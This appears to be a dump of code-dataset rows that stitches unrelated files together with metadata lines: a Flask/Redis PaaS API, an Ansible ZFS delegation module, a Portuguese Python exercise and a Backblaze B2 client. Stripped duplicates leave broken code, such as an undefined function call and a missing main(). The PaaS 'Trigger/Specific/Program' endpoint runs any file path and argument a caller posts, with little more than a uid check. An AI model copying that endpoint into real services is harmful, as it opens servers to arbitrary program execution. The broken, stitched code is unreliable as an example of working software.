                if dbRedis.llen(redis_key) == 0: status = False
        for i in reqdataList:
            dbRedis.lpush(redis_key, i)
            # Register this key under each file name in the reference hash.
            if dbRedis.hexists("rederence_point",i):
                this_list = json.loads(dbRedis.hget("rederence_point", i))
                this_list.append(redis_key)
                dbRedis.hmset("rederence_point",{i:json.dumps(this_list)})
            else:
                dbRedis.hmset("rederence_point",{i:json.dumps([redis_key])})
        dbRedis.expire(redis_key,86400)
        if not redishash_already_set_expireat:
            dbRedis.expireat("rederence_point",rederence_extime)
        dicRet["ID"] = ID
        dicRet["PWD"] = PWD
        dicRet["DownloadList"] = reqdataList
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
    dicRet["Response"] = err_msg
    return jsonify( **dicRet)
#}}}
#=======================================================
# Validate the legitimacy of the id & pwd used for the download-files feature
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
def check_downloadfiles_idpwd():
    """Validate a download id/pwd pair and return the file list it grants.

    Expects JSON post data with "Id" and "Pwd"; looks up the redis list
    stored under "<Id>_<Pwd>" (db 15). On success the JSON response
    carries "DownloadList"; a missing key yields the wrong-credentials
    message.
    """
    err_msg = "ok"
    dicRet = appPaaS.preProcessRequest(request, system="PaaS")
    uri_parameter = ["uid"]
    result, result_msg = check_uri_parameter_exist(request, uri_parameter)
    if not result:
        dicRet["Response"] = result_msg
        return jsonify(**dicRet)
    if not VerifyDataStrLawyer(request.data).verify_json():
        dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
        return jsonify(**dicRet)
    reqdataDict = ConvertData().convert(json.loads(request.data))
    post_parameter = ["Id", "Pwd"]
    if not check_post_parameter_exist(reqdataDict, post_parameter):
        dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
        return jsonify(**dicRet)
    Id = reqdataDict.get("Id").encode("utf8").strip()
    Pwd = reqdataDict.get("Pwd").encode("utf8").strip()
    try:
        dbRedis, _, result = appPaaS.getDbSessionType(system="PaaS", dbName=15, forRawData="redis")
        if dbRedis is None:
            # A None handle means the redis connection could not be established.
            dicRet["Response"] = result
            return jsonify(**dicRet)
        redis_key = Id + "_" + Pwd
        if not dbRedis.exists(redis_key):
            dicRet["Response"] = "帳號或密碼錯誤"
            return jsonify(**dicRet)
        # fixed: materialize the iterator directly instead of the identity
        # comprehension; also dropped the unused recList/redundant init.
        dicRet["DownloadList"] = list(_list_iter(dbRedis, redis_key))
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e, sys.exc_info(), "PaaS")
    dicRet["Response"] = err_msg
    return jsonify(**dicRet)
#}}}
#=======================================================
# Check download-file deadlines and delete whatever has expired
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
def check_delete_downloadfiles_deadline(CRONTAB="DAY"):
    """Cron endpoint that expires download bookkeeping in redis (db 15).

    CRONTAB == "DAY" (daily, 00:45): for each file in the "rederence_point"
    hash, drop id/pwd keys that no longer exist in redis; when a file loses
    its last key, delete the file from disk and its hash entry, otherwise
    write the pruned key list back.

    CRONTAB == "WEEK" (Sunday, 01:00): delete any file on disk that no
    longer appears in the "rederence_point" hash at all.
    """
    err_msg = "ok"
    dicRet = appPaaS.preProcessRequest(request, system="PaaS")
    uri_parameter = ["uid"]
    result, result_msg = check_uri_parameter_exist(request, uri_parameter)
    if not result:
        dicRet["Response"] = result_msg
        return jsonify(**dicRet)
    FILEPATH = "/var/www/html/download/files/"
    try:
        dbRedis, _, result = appPaaS.getDbSessionType(system="PaaS", dbName=15, forRawData="redis")
        if dbRedis is None:
            # A None handle means the redis connection could not be established.
            dicRet["Response"] = result
            return jsonify(**dicRet)
        if CRONTAB == "DAY":
            for key, value in dbRedis.hgetall("rederence_point").items():
                # Keep only the id/pwd keys that are still alive in redis.
                # (fixed: the original used a `for ... else`; with no `break`
                # the else-branch always ran after the loop, so this plain
                # post-loop form is equivalent and far less misleading.)
                new_value = [i for i in json.loads(value) if dbRedis.exists(i)]
                if not new_value:
                    # Nobody references this file any more: remove the file
                    # and its reference-hash entry.
                    if os.path.isfile(os.path.join(FILEPATH, key)): os.remove(os.path.join(FILEPATH, key))
                    dbRedis.hdel("rederence_point", key)
                else:
                    dbRedis.hmset("rederence_point", {key: json.dumps(new_value)})
        elif CRONTAB == "WEEK":
            fileList = show_downloadfiles(True)
            for i in fileList:
                if i not in dbRedis.hkeys("rederence_point") and os.path.isfile(os.path.join(FILEPATH, i)): os.remove(os.path.join(FILEPATH, i))
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e, sys.exc_info(), "PaaS")
    dicRet["Response"] = err_msg
    return jsonify(**dicRet)
#}}}
#=======================================================
# Provide an API that triggers a specified program
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
    #{{{APIINFO
    # The docstring below is machine-readable API documentation consumed at
    # runtime (docstring_parameter decorator) -- left byte-identical.
    '''
    {
     "API_application":"提供觸發指定程式",
     "API_parameters":{"uid":"使用者帳號"},
     "API_path_parameters":{"SYSTEM":"合法的系統名稱"},
     "API_postData":{
        "bodytype":"Object",
        "bodyschema":"{}",
        "parameters":{
            "languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
            "programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
            "programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
        },
        "precautions":{
            "注意事項1":"languages目前只接受php語言",
            "注意事項2":"programName程式路徑必須存在"
        },
        "example":[
            {
                "languages":"php",
                "programName":"test.php",
                "programData":"123"
            }
        ]
     },
     "API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
     "API_example":{
        "Response": "ok",
        "APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
        "OperationTime": "3.020",
        "BytesTransferred": 223,
        "System": "IOT",
        "GetProgramResponse": "test"
     }
    }
    '''
    #}}}
    err_msg = "error"
    # Maps accepted "languages" values to the interpreter binary; C programs
    # are executed directly (empty prefix, see the cmd.pop(0) below).
    languages_config = {
        "php":"/usr/bin/php",
        "c":""
    }
    if not selfUse:
        # External HTTP call: validate uid, JSON body and required post keys.
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
        if not VerifyDataStrLawyer(request.data).verify_json():
            dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
            return jsonify( **dicRet)
        reqdataDict = json.loads(request.data)
        # A doubly-encoded JSON body decodes to a unicode string; decode again.
        if isinstance(reqdataDict,type(u"")):
            reqdataDict = json.loads(reqdataDict)
        post_parameter = ["languages","programName","programData"]
        if not check_post_parameter_exist(reqdataDict,post_parameter):
            dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
            return jsonify( **dicRet)
        languages = reqdataDict.get("languages")
        programName = reqdataDict.get("programName")
        programData = reqdataDict.get("programData")
    # NOTE(review): when selfUse is True, dicRet is never assigned, so the
    # error paths below (and the non-threaded branch) would raise
    # NameError -- confirm internal callers always pass useThread=True.
    if languages not in languages_config.keys():
        dicRet["Response"] = "Currently only php and C programs can be executed"
        return jsonify( **dicRet)
    # dict payloads are serialized so they travel as a single argv token.
    if isinstance(programData,dict): programData = json.dumps(programData)
    if not os.path.isfile(programName):
        dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
        return jsonify( **dicRet)
    cmd = [languages_config[languages],programName]
    if programData: cmd.append(programData)
    try:
        if useThread:
            # Fire-and-forget: hand the command to celery (Temp=True) or a
            # worker thread; the subprocess result is not reported back.
            if Temp:
                from celeryApp.celeryTasks import celery_trigger_specific_program
                celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
            else:
                worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
                worker.start()
            err_msg = "ok"
            return
        else:
            # Synchronous execution: run the program and report its output.
            # For C the empty interpreter prefix is dropped from argv.
            if languages == "c": cmd.pop(0)
            dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
            dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            # process is (ok, stdout_or_error, info_dict) -- see
            # subprocess_check_output_program.
            if process[0]:
                dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
                err_msg = "ok"
            else:
                # Strip the raw command from the error payload before
                # exposing it to the caller.
                del process[2]["cmd"]
                dicRet["GetProgramResponse"] = process[2]
                err_msg = "error"
    except Exception as e:
        print "~~~Exception~~~"
        print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
        print e
        print sys.exc_info()
    finally:
        # NOTE(review): returning from finally swallows any in-flight
        # exception; here exceptions are already caught above, but keep this
        # in mind when editing the try-block.
        if not selfUse:
            dicRet["Response"] = err_msg
            return jsonify(**dicRet)
#}}}
#=======================================================
# Definition: For IoT -- initialize the redis mes_device_status keys (hash)
#             that IoT needs, sourced from a mysql table
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
    """
    For IoT: initialize the redis device keys (hashes) that IoT needs by
    mirroring the mysql "preload" table into per-device hashes and pruning
    stale mes_device_status_* keys.
    Args:
        SYSTEM: name of the system to operate on
        selfUse: True when called internally; suppresses the flask response
    Returns:
        flask JSON response when selfUse is False, otherwise None
    """
    if not selfUse:
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
    all_device = {}
    err_msg = "error"
    # Phase 1: read the "preload" table and build
    # {main_key + "_" + combine_key: parsed combine_list} for every row.
    try:
        DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
        if DbSession is None:
            return
        sess = DbSession()
        queryTable = Table("preload" , metadata, autoload=True)
        for row in sess.query(queryTable).all():
            drow = AdjustDataFormat().format(row._asdict())
            all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
        err_msg = "ok" #done successfully
        # http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
    except Exception as e:
        err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
    finally:
        # Always release the sqlalchemy session/engine, even on failure.
        if 'DbSession' in locals().keys() and DbSession is not None:
            sess.close()
            DbSession.remove()
            engine.dispose()
    if err_msg != "ok":
        if selfUse: return
        if not selfUse:
            dicRet["Response"] = err_msg
            return jsonify( **dicRet)
    err_msg = "error"
    # Phase 2: sync the collected device data into redis; the redis db
    # number is the system's position in the configured system list.
    try:
        redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
        dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
        if dbRedis is None:
            return
        for key,value in all_device.items():
            # Key absent in redis: create the whole hash outright.
            if not dbRedis.exists(key):
                dbRedis.hmset(key, value)
            # Key present: diff the hash fields against the new value.
            else:
                # Set difference: stale fields in redis but not in the new
                # value must be deleted.
                fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
                if fields_need_del: dbRedis.hdel(key, *fields_need_del)
                # Set difference: new fields missing from redis must be added.
                fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
                if fields_need_add:
                    for value_key,value_value in value.items():
                        if value_key in fields_need_add:
                            dbRedis.hset(key, value_key, value_value)
        # Prune mes_device_status_* keys no longer backed by a preload row.
        keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
        if keys_need_del: dbRedis.delete(*keys_need_del)
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
    finally:
        if not selfUse:
            dicRet["Response"] = err_msg
            return jsonify( **dicRet)
#}}} | 11,214 | 30 | 186 |
6b3efd1aae05ddf74ce1988978831f8593a45457 | 9,521 | py | Python | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/homelab | ffdd849e39b52972870f5552e734fd74cb1254a1 | [
"Apache-2.0"
] | 5 | 2020-12-16T21:42:09.000Z | 2022-03-28T16:04:32.000Z | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/kubernetes-the-hard-way | 70fd096a04addec0777744c9731a4e3fbdc40c8f | [
"Apache-2.0"
] | null | null | null | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/kubernetes-the-hard-way | 70fd096a04addec0777744c9731a4e3fbdc40c8f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| 35.928302 | 152 | 0.595106 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
class ZfsDelegateAdmin(object):
    """Driver for `zfs allow` / `zfs unallow` delegation management.

    Reads the AnsibleModule parameters once in __init__, validates them in
    setup(), and run() applies either update() (grant/revoke for the given
    entities) or clear() (state=absent with no entities: wipe everything).
    """
    def __init__(self, module):
        self.module = module
        self.name = module.params.get('name')
        self.state = module.params.get('state')
        self.users = module.params.get('users')
        self.groups = module.params.get('groups')
        self.everyone = module.params.get('everyone')
        self.perms = module.params.get('permissions')
        self.scope = None
        self.changed = False
        self.initial_perms = None
        self.subcommand = 'allow'
        self.recursive_opt = []
        self.run_method = self.update
        self.setup(module)
    def setup(self, module):
        """ Validate params and set up for run.
        """
        if self.state == 'absent':
            self.subcommand = 'unallow'
            # -r (recursive) is only meaningful for `zfs unallow`.
            if module.params.get('recursive'):
                self.recursive_opt = ['-r']
        local = module.params.get('local')
        descendents = module.params.get('descendents')
        # Neither or both flags -> local+descendent scope, like the CLI default.
        if (local and descendents) or (not local and not descendents):
            self.scope = 'ld'
        elif local:
            self.scope = 'l'
        elif descendents:
            self.scope = 'd'
        else:
            self.module.fail_json(msg='Impossible value for local and descendents')
        if not (self.users or self.groups or self.everyone):
            if self.state == 'present':
                self.module.fail_json(msg='One of `users`, `groups`, or `everyone` must be set')
            elif self.state == 'absent':
                self.run_method = self.clear
            # ansible ensures the else cannot happen here
        self.zfs_path = module.get_bin_path('zfs', True)
    @property
    def current_perms(self):
        """ Parse the output of `zfs allow <name>` to retrieve current permissions.
        """
        out = self.run_zfs_raw(subcommand='allow')
        # perms[scope][entity-type] -> {name: [perm, ...]} / everyone-list.
        perms = {
            'l': {'u': {}, 'g': {}, 'e': []},
            'd': {'u': {}, 'g': {}, 'e': []},
            'ld': {'u': {}, 'g': {}, 'e': []},
        }
        linemap = {
            'Local permissions:': 'l',
            'Descendent permissions:': 'd',
            'Local+Descendent permissions:': 'ld',
        }
        scope = None
        for line in out.splitlines():
            # A section header switches scope; other lines keep the last one.
            scope = linemap.get(line, scope)
            if not scope:
                continue
            try:
                if line.startswith('\tuser ') or line.startswith('\tgroup '):
                    ent_type, ent, cur_perms = line.split()
                    perms[scope][ent_type[0]][ent] = cur_perms.split(',')
                elif line.startswith('\teveryone '):
                    perms[scope]['e'] = line.split()[1].split(',')
            except ValueError:
                self.module.fail_json(msg="Cannot parse user/group permission output by `zfs allow`: '%s'" % line)
        return perms
    def run_zfs_raw(self, subcommand=None, args=None):
        """ Run a raw zfs command, fail on error.
        """
        cmd = [self.zfs_path, subcommand or self.subcommand] + (args or []) + [self.name]
        rc, out, err = self.module.run_command(cmd)
        if rc:
            self.module.fail_json(msg='Command `%s` failed: %s' % (' '.join(cmd), err))
        return out
    def run_zfs(self, args):
        """ Run zfs allow/unallow with appropriate options as per module arguments.
        """
        args = self.recursive_opt + ['-' + self.scope] + args
        if self.perms:
            args.append(','.join(self.perms))
        return self.run_zfs_raw(args=args)
    def clear(self):
        """ Called by run() to clear all permissions.
        """
        changed = False
        stdout = ''
        # Unallow every user and group in every scope...
        for scope, ent_type in product(('ld', 'l', 'd'), ('u', 'g')):
            for ent in self.initial_perms[scope][ent_type].keys():
                stdout += self.run_zfs(['-%s' % ent_type, ent])
                changed = True
        # ...then the `everyone` grants, scope by scope.
        for scope in ('ld', 'l', 'd'):
            if self.initial_perms[scope]['e']:
                stdout += self.run_zfs(['-e'])
                changed = True
        return (changed, stdout)
    def update(self):
        """ Update permissions as per module arguments.
        """
        stdout = ''
        for ent_type, entities in (('u', self.users), ('g', self.groups)):
            if entities:
                stdout += self.run_zfs(['-%s' % ent_type, ','.join(entities)])
        if self.everyone:
            stdout += self.run_zfs(['-e'])
        # changed = the permission state actually differs afterwards.
        return (self.initial_perms != self.current_perms, stdout)
    def run(self):
        """ Run an operation, return results for Ansible.
        """
        exit_args = {'state': self.state}
        self.initial_perms = self.current_perms
        exit_args['changed'], stdout = self.run_method()
        if exit_args['changed']:
            exit_args['msg'] = 'ZFS delegated admin permissions updated'
            exit_args['stdout'] = stdout
        self.module.exit_json(**exit_args)
def main():
    """Module entry point: declare the interface and run the delegation logic."""
    argument_spec = dict(
        name=dict(type='str', required=True),
        state=dict(type='str', default='present', choices=['absent', 'present']),
        users=dict(type='list'),
        groups=dict(type='list'),
        everyone=dict(type='bool', default=False),
        permissions=dict(
            type='list',
            choices=['allow', 'clone', 'create', 'destroy', 'diff', 'hold', 'mount', 'promote',
                     'readonly', 'receive', 'release', 'rename', 'rollback', 'send', 'share',
                     'snapshot', 'unallow'],
        ),
        local=dict(type='bool'),
        descendents=dict(type='bool'),
        recursive=dict(type='bool', default=False),
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=False,
        # `permissions` is mandatory whenever state=present.
        required_if=[('state', 'present', ['permissions'])],
    )
    ZfsDelegateAdmin(module).run()


if __name__ == '__main__':
    main()
| 1,525 | 4,383 | 46 |
c37c17386d62d65f5ba6388fde11f69c4d3ea317 | 590 | py | Python | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | #Funções
''''
===========================================
def equacao_reta(x):
y_x = 2 * x + 1
return y_x
x = float(input("Entre com o valor a ser calculado para y(x) = 2x+1: "))
resultado = equacao_reta(x)
print("O resultado encontrado foi Y = %.0f" %resultado)
============================================
'''
lista_x = [1,2,3,4,5,6]
lista_y = []
for valor_x in lista_x:
lista_y.append(equacao_reta(valor_x))
for valor_x,valor_y in zip(lista_x,lista_y):
print("O valor de y(%0.1f) = %0.1f"%(valor_x,valor_y)) | 24.583333 | 72 | 0.540678 | #Funções
''''
===========================================
def equacao_reta(x):
y_x = 2 * x + 1
return y_x
x = float(input("Entre com o valor a ser calculado para y(x) = 2x+1: "))
resultado = equacao_reta(x)
print("O resultado encontrado foi Y = %.0f" %resultado)
============================================
'''
def equacao_reta(X):
    """Evaluate the straight line y(x) = 2x + 1 at the point X."""
    return 2 * X + 1
# Evaluate y(x) = 2x + 1 over the sample points and report each pair.
lista_x = [1, 2, 3, 4, 5, 6]
lista_y = [equacao_reta(valor) for valor in lista_x]
for valor_x, valor_y in zip(lista_x, lista_y):
    print("O valor de y(%0.1f) = %0.1f" % (valor_x, valor_y))
c7c474c76f41f3c6859a3bf71ad2eb3dfbade394 | 5,319 | py | Python | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | null | null | null | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | null | null | null | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | 1 | 2019-07-16T03:38:49.000Z | 2019-07-16T03:38:49.000Z | from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
| 23.745536 | 72 | 0.51645 | from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
class BlockingFile(BaseFile):
    """Blocking (synchronous) operations on a single Backblaze B2 file.

    Wraps the b2 file endpoints (parts, copy, cancel, get, delete,
    upload-url, download, save) through the blocking HTTP helpers on
    ``self._context``.
    """
    def parts(self, part_number: int = 0) -> BlockingParts:
        """Used to work with this file's upload parts.
        Parameters
        ----------
        part_number : int, optional
            by default 0
        Returns
        -------
        BlockingParts
        """
        return BlockingParts(
            self,
            self._context,
            part_number
        )
    @authorize_required
    def copy(self, settings: CopyFileSettings
             ) -> Tuple[FileModel, "BlockingFile"]:
        """Used to copy a file.
        Parameters
        ----------
        settings : CopyFileSettings
        Returns
        -------
        FileModel
            Details on the newly created copy.
        BlockingFile
            Handle on the copy, bound to the same bucket.
        """
        data = cast(
            dict,
            self._context._post(
                url=self._context._routes.file.copy,
                json={"sourceFileId": self.file_id, **settings.payload},
                include_account=False
            )
        )
        return (
            FileModel(data),
            BlockingFile(data["fileId"], self._context, self.bucket_id)
        )
    @authorize_required
    def cancel(self) -> PartCancelModel:
        """Used for cancelling an uncompleted large file.
        Returns
        -------
        PartCancelModel
            Holds details on the canceled file.
        """
        # Drop any cached upload URL for this file before cancelling.
        UploadUrlCache(self.bucket_id, self.file_id).delete()
        return PartCancelModel(
            self._context._post(
                url=self._context._routes.file.cancel_large,
                json={"fileId": self.file_id},
                include_account=False
            )
        )
    @authorize_required
    def get(self) -> FileModel:
        """Used to get details on a file.
        Returns
        -------
        FileModel
            Holds details on a file.
        """
        return FileModel(
            self._context._post(
                url=self._context._routes.file.get,
                json={"fileId": self.file_id},
                include_account=False
            )
        )
    @authorize_required
    def delete(self, name: str = None) -> FileDeleteModel:
        """Deletes the given file.
        Parameters
        ----------
        name : str, optional
            Name of file; if not given, self.get is called to look it up,
            by default None.
        Returns
        -------
        FileDeleteModel
            Holds details on the deleted file.
        """
        if not name:
            name = (self.get()).file_name
        return FileDeleteModel(
            self._context._post(
                url=self._context._routes.file.delete,
                json={"fileName": name, "fileId": self.file_id},
                include_account=False
            )
        )
    @authorize_required
    def upload_url(self) -> UploadUrlModel:
        """Used to get a part upload URL.
        Returns
        -------
        UploadUrlModel
            Holds details on the upload URL.
        Notes
        -----
        Caching is used: a previously fetched URL for this
        (bucket_id, file_id) pair is returned without a new request.
        """
        cache = UploadUrlCache(self.bucket_id, self.file_id)
        upload_url = cache.find()
        if upload_url:
            return cast(
                UploadUrlModel,
                upload_url
            )
        return cache.save(UploadUrlModel(
            self._context._post(
                url=self._context._routes.upload.upload_part,
                json={
                    "fileId": self.file_id
                },
                include_account=False
            )
        ))
    @authorize_required
